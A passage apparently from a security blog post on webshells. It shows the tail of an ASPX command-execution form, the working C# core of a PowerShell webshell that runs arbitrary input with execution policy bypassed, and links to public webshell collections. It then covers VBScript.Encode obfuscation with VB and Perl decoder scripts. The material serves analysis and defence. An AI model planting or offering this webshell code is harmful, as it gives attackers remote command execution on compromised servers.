runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" /> </form>
Relevant Link:
http://www.jb51.net/article/26387.htm http://blog.csdn.net/zaiyong/article/details/25873399 https://raw.githubusercontent.com/tennc/webshell/master/net-friend/aspx/aspxspy.aspx http://www.jb51.net/article/39983.htm https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx https://github.com/tennc/webshell/blob/master/aspx/icesword.aspx
0x3: PowerShell Webshell
string do_ps(string arg) { //This section based on cmdasp webshell by http://michaeldaw.org ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; }
Relevant Link:
https://www.microsoft.com/taiwan/technet/columns/profwin/28-monad.mspx https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx
4. webshell中常见的编码转换隐藏方式
0x1: VBScript.encode
Public Function DCScript(ByVal Script As String) As String Dim s As String, l As Long Dim b As Long, e As Long Dim k As Long l = LenB(Script): s = Space(l) '... b = InStr(Script, "#@~^") '#@~^******== e = InStr(Script, "^#~@") '******==^#~@ If b = 0 Or e = 0 Then If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then Exit Function Else If e = 0 Then e = l Else e = e - 8 If b = 0 Then b = 1 Else b = b + 12 End If Else b = b + 12 '为0则全部解密 e = e - 8 '为0则算到末尾 End If frmMain.Caption = "Decoding ..." Script = Mid(Script, b, e - b + 1) 'Script = Replace(Script, "@#", Chr(13)) 'Script = Replace(Script, "@&", Chr(10)) Script = Replace(Script, "@#@&", Chr(13) + Chr(10)) 'vbcCrlf Script = Replace(Script, "@!", "<") Script = Replace(Script, "@*", ">") Script = Replace(Script, "@$", "@") '最后生成@ 'k = YXScrDecode(Script, s, Len(Script)) k = YXScrDecoder(Script, s) 's = Replace(s, Chr(13) + Chr(2), vbCrLf)'查出来是0x10和0x0A的原因 '引出另一个问题,为什么char数组第-1个元素为0x02 frmMain.Caption = "碰到我算你倒霉!" DCScript = Left(s, k) End Function
perl代码
#!/usr/bin/perl -w -- # VBScript/JScript.Encode Decoder # Based on Full-Disclosure message "VBScript/JScript.Encode Decoder" # by Andreas Marx <amarx [at] gega-it>, dated 16 Sep 03 # http://lists.netsys.com/pipermail/full-disclosure/2003-September/010155.html # # See also: # http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm # http://www.saltstorm.net/lib-soya/Soya/Encode/ScriptDecoder.js # http://www.virtualconspiracy.com/scrdec.html # http://www.virtualconspiracy.com/download/scrdec14.c # http://www.r4k.net/dec/dec.pl @itab = ( # table order 0,2,1,0,2,1,2,1,1,2,1,2,0,1,2,1, 0,1,2,1,0,0,2,1,1,2,0,1,2,1,1,2, 0,0,1,2,1,2,1,0,1,0,0,2,1,0,1,2, 0,1,2,1,0,0,2,1,1,0,0,2,1,0,1,2); @dectab0 = ( # tables to decrypt "\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x57","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F", "\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F", "\x2E","\x47","\x7A","\x56","\x42","\x6A","\x2F","\x26","\x49","\x41","\x34","\x32","\x5B","\x76","\x72","\x43", "\x38","\x39","\x70","\x45","\x68","\x71","\x4F","\x09","\x62","\x44","\x23","\x75","\x3C","\x7E","\x3E","\x5E", "\xFF","\x77","\x4A","\x61","\x5D","\x22","\x4B","\x6F","\x4E","\x3B","\x4C","\x50","\x67","\x2A","\x7D","\x74", "\x54","\x2B","\x2D","\x2C","\x30","\x6E","\x6B","\x66","\x35","\x25","\x21","\x64","\x4D","\x52","\x63","\x3F", "\x7B","\x78","\x29","\x28","\x73","\x59","\x33","\x7F","\x6D","\x55","\x53","\x7C","\x3A","\x5F","\x65","\x46", "\x58","\x31","\x69","\x6C","\x5A","\x48","\x27","\x5C","\x3D","\x24","\x79","\x37","\x60","\x51","\x20","\x36"); @dectab1 = ( "\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x7B","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F", "\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F", "\x32","\x30","\x21","\x29","\x5B","\x38","\x33","\x3D","\x58","\x3A","\x35","\x65","\x39","\x5C","\x56","\x73", "\x66","\x4E","\x45","\x6B","\x62","\x59","\x78","\x5E","\x7D","\x4A","\x6D","\x71","\x3C","\x60","\x3E","\x53", "\xFF","\x42","\x27","\x48","\x72","\x75","\x31","\x37","\x4D","\x52","\x22","\x54","\x6A","\x47","\x64","\x2D", "\x20","\x7F","\x2E","\x4C","\x5D","\x7E","\x6C","\x6F","\x79","\x74","\x43","\x26","\x76","\x25","\x24","\x2B", "\x28","\x23","\x41","\x34","\x09","\x2A","\x44","\x3F","\x77","\x3B","\x55","\x69","\x61","\x63","\x50","\x67", "\x51","\x49","\x4F","\x46","\x68","\x7C","\x36","\x70","\x6E","\x7A","\x2F","\x5F","\x4B","\x5A","\x2C","\x57"); @dectab2 = ( "\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x6E","\x0A","\x0B","\x0C","\x06","\x0E","\x0F", "\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F", "\x2D","\x75","\x52","\x60","\x71","\x5E","\x49","\x5C","\x62","\x7D","\x29","\x36","\x20","\x7C","\x7A","\x7F", "\x6B","\x63","\x33","\x2B","\x68","\x51","\x66","\x76","\x31","\x64","\x54","\x43","\x3C","\x3A","\x3E","\x7E", "\xFF","\x45","\x2C","\x2A","\x74","\x27","\x37","\x44","\x79","\x59","\x2F","\x6F","\x26","\x72","\x6A","\x39", "\x7B","\x3F","\x38","\x77","\x67","\x53","\x47","\x34","\x78","\x5D","\x30","\x23","\x5A","\x5B","\x6C","\x48", "\x55","\x70","\x69","\x2E","\x4C","\x21","\x24","\x4E","\x50","\x09","\x56","\x73","\x35","\x61","\x4B","\x58", "\x3B","\x57","\x22","\x6D","\x4D","\x25","\x28","\x46","\x4A","\x32","\x41","\x3D","\x5F","\x4F","\x42","\x65"); $_ = join('', <>); (m/\Q#@~^\E/ and $_ = $') or die "Start marker not found\n"; (m/\Q^#~@\E/ and $_ = $`) or die "End marker not found\n"; # We do not check leading checksum. Is trailing checksum always present? (m/^[A-Za-z0-9+\/]{6}==/ and $_ = $') or die "No leading checksum\n"; (m/[A-Za-z0-9+\/]{6}==$/ and $_ = $`); # or die "No trailing checksum\n"; $pos = 0; # decrypt encrypted block $special = 0; foreach (split //) { if ($special) { $special = 0; tr/&#!*$/\n\r<>@/; } elsif ($_ lt "\x80") { # encrypted? if ($itab[$pos] == 0) { $_ = $dectab0[ord($_)]; } elsif ($itab[$pos] == 1) { $_ = $dectab1[ord($_)]; } elsif ($itab[$pos] == 2) { $_ = $dectab2[ord($_)]; } if ($_ eq "\xff") { $special = 1; next; } } print; $pos = ($pos+1)%64; }
Relevant Link:
http://dennisbabkin.com/screnc/ http://blog.csdn.net/prsniper/article/details/5447675 http://www.password-crackers.com/crack/scrdec.html http://download.aprilgreendownload.com/lp7_750/query.php?q=vbscript+encoder+download&ti1=12767882&ti2=0&ti3=2016-01-12T08%3A12%3A46.786244%2B00%3A00 http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/29670
0x2: UTF-7
Relevant Link:
http://www.xuebuyuan.com/1266585.html
Copyright (c) 2015 LittleHann All rights reserved